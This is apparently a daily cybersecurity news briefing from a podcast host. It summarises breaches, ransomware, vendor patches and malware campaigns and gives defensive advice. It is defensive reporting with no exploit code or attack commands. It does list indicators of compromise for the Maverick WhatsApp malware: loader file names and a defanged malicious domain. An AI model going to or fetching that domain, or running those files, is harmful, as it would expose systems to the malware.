Good Morning Security Gang
I’m on the road this morning, so not broadcasting from the usual bunker, and worse — no espresso, just drip coffee. Yeah, I know — tragic.
But even without the double shot, I’m here, fired up and ready, because today’s show is stacked. We’re breaking down fallout from the Oracle E-Business Suite exploit, a major ransomware hit on Asahi Beer in Japan, and all the chaos from Patch Tuesday, including critical fixes from Microsoft, Adobe, SAP, and more.
So grab your coffee, wherever you are — coffee cup cheers, y’all! Let’s get into today’s headlines.
GlobalLogic Confirms Data Theft in Oracle EBS Breach
GlobalLogic, a subsidiary of Hitachi, has notified over 10,000 employees of a data breach linked to the Oracle E-Business Suite zero-day (CVE-2025-61882). This same exploit has fueled attacks across dozens of organizations, as reported yesterday.
The stolen data includes names, Social Security numbers, tax IDs, and bank details, with exfiltration traced back to October 9. That’s not just a data leak — that’s a payroll redirection and identity theft goldmine.
GlobalLogic says the intrusion began in July or August, confirming that attackers had months of undetected access. This continues the ripple effect from the Oracle EBS exploit, which has now become one of the most widespread enterprise breaches of 2025.
If you’re running Oracle EBS, assemble your change management and patching team immediately. The longer this waits, the closer you get to your own headline.
Asahi Beer Ransomware Attack Cripples Production in Japan
Asahi Breweries, one of Japan’s largest beverage producers, remains crippled following a ransomware attack. The Kalin ransomware group has claimed responsibility, leaking data to pressure payment.
The attack disrupted production and distribution, causing ripple effects across retailers and logistics partners. This one’s a textbook OT/ICS attack: downtime equals dollars.
As I said on the show — manufacturing shutdowns are catastrophic because recovery time and ramp-up time aren’t linear. If you lose six weeks of production, it can take six months to recover full capacity.
Mitigation advice for manufacturers:
Isolate OT and ICS networks.
Use data diodes or network obfuscation if integration is unavoidable.
Rehearse paper-based logistics workflows.
And test offline immutable backups regularly.
Ransomware groups love manufacturers for one reason — downtime pays.
Microsoft Patch Tuesday Fixes 60 Flaws, One Actively Exploited Zero-Day
This month’s Patch Tuesday was mercifully lighter than usual — about 60 vulnerabilities, including one actively exploited Windows kernel zero-day (CVE-2025-62215).
The flaw allows local privilege escalation via race condition, enabling EDR bypass, lateral movement, and potential system-level persistence. Expect exploit kits soon.
My advice: patch immediately, force a reboot window, and hunt for token manipulation or LSASS anomalies. Compared to last month’s chaos of six zero-days, this one feels almost tame — but don’t let that fool you.
Adobe Patches 29 Vulnerabilities Across Creative Suite
Adobe dropped patches for 29 vulnerabilities spanning Photoshop, Illustrator, InDesign, InCopy, and Substance 3D Stager.
Several bugs are critical code execution vulnerabilities, though none have been observed in the wild. Adobe patches are typically straightforward — most environments can test and push updates same-day, except where enterprise integrations require staging.
If you’re running large design or marketing teams, update before end of week. This one’s low-effort, high-reward.
SAP Fixes Critical SQL Vulnerability Rated a Perfect 10
SAP’s November updates include a 10.0 CVSS vulnerability (CVE-2025-42890) — a hardcoded credential issue in SQL Anywhere Monitor — and a 9.9-rated code injection flaw in Solution Manager (CVE-2025-42887).
SAP’s fix? Remove SQL Anywhere Monitor entirely. These are direct code execution risks inside ERP and ITSM systems, meaning attackers can own your business logic layer.
If you’re running SAP:
Apply all November notes.
Remove SQL Anywhere Monitor.
Rotate SAP service credentials.
Review RFC configurations for abuse potential.
This is a high-stakes update cycle — treat it as such.
Ivanti Endpoint Manager Hit by Arbitrary File Write Flaw
Ivanti’s Endpoint Manager has yet another round of vulnerabilities — local privilege escalation and remote code execution flaws impacting supported and legacy branches.
The 2022 branch is end-of-life — if you’re still running it, rip it out. I said it on the show, and I’ll repeat it here: if China loves a tool, it’s time for you to retire it. Ivanti remains a persistent favorite among Chinese APTs because of its deep enterprise reach and weak lifecycle management.
Patch the latest supported builds, and don’t leave this unaddressed.
Firefox 145 Delivers Security and Privacy Hardening
Mozilla released Firefox 145, featuring anti-fingerprinting improvements and enhanced baseline privacy controls.
Organizations should roll out the update through enterprise policies, ensuring consistent security configurations across browsers. A reminder: browsers are often your most exposed attack surface, and every new release helps keep telemetry and tracking under control.
Maverick WhatsApp Malware Hijacking Browser Sessions
The new Maverick malware is spreading across Brazil via WhatsApp Web, hijacking browser sessions to steal credentials and propagate phishing attacks.
The campaign uses .NET-based PowerShell loaders, disables UAC and Defender, and abuses Selenium and ChromeDriver for automation.
It’s targeting Latin American retail and hospitality firms for now — but given WhatsApp’s global use, this could easily go worldwide. If your organization operates outside the U.S., this is a real risk.
Block ChromeDriver, restrict WhatsApp Web on corporate devices, and monitor for PowerShell IOCs (OrcaMento.vps, Tadu.ps1, domains like zapgrand[.]com).
Van Helsing: A New Ransomware-as-a-Service Operation Emerges
A new ransomware family dubbed Van Helsing is gaining traction on dark web forums. It targets Windows, Linux, macOS, BSD, ARM, and ESXi, offering affiliates 80% profit shares and requiring a $5,000 buy-in.
Its encryption uses ChaCha20 and Curve25519, and its lateral movement capabilities make it particularly dangerous in hybrid environments.
To defend against it:
Deploy EDR on hypervisors.
Sign SMB traffic.
Limit privileged service accounts.
Van Helsing is proof that ransomware is going multi-platform faster than many defenders can adapt.
New York Enforces “Junk Fee” Transparency Law
Starting this week, New York’s junk fee pricing law takes effect, requiring total price transparency at checkout — critical for SaaS and e-commerce.
Noncompliance can lead to fines. If you sell in New York:
Audit your checkout flows.
Include all taxes and fees upfront.
Update UX copy and legal disclosures.
The Bitcoin Queen Sentenced to 11 Years in Prison
The infamous “Bitcoin Queen,” Zhimin Qian, has been sentenced to 11 years and 8 months in the U.K. after laundering over $5.3 billion in crypto linked to Chinese fraud schemes between 2014–2017.
Authorities seized 61,000 Bitcoin, worth more than $7 billion, in one of the largest crypto busts ever.
As I said on the show — she should count herself lucky she was arrested in the U.K. If this trial happened in China, she’d have been executed within 30 days. Justice looks very different depending on which side of the world you’re on.
Action List
🧩 Patch Oracle EBS (CVE-2025-61882) immediately.
🍺 Isolate OT networks and test offline backups if in manufacturing.
🧱 Apply Microsoft and Adobe updates before end of week.
🧑💻 Remove SAP SQL Anywhere Monitor and rotate credentials.
🔐 Patch Ivanti and decommission end-of-life versions.
🌐 Update Firefox 145 across enterprise environments.
📲 Block WhatsApp Web and Selenium executables.
⚙️ Review ransomware tabletop playbooks — Van Helsing is cross-platform.
💳 Audit pricing transparency for New York compliance.
James Azar’s CISO’s Take
Today’s episode ties together one truth — our environments are too interconnected for lazy patching. From Oracle EBS to Ivanti and SAP, the same pattern keeps showing up: systems built for efficiency becoming the attack vector for exploitation. Add to that ransomware hitting operational technology, and we’re reminded that resilience isn’t just digital — it’s physical.
My takeaway this morning: patching is the easy part; discipline is the hard part. If you can’t manage change fast enough, you’re managing risk instead of reducing it. And in manufacturing or enterprise software, the difference between the two can be millions in lost revenue.
Stay sharp, Security Gang. Keep your backups offline, your browsers patched, and your passwords smarter than “Louvre.”
Until tomorrow — stay caffeinated, stay vigilant, and most importantly — stay cyber safe.
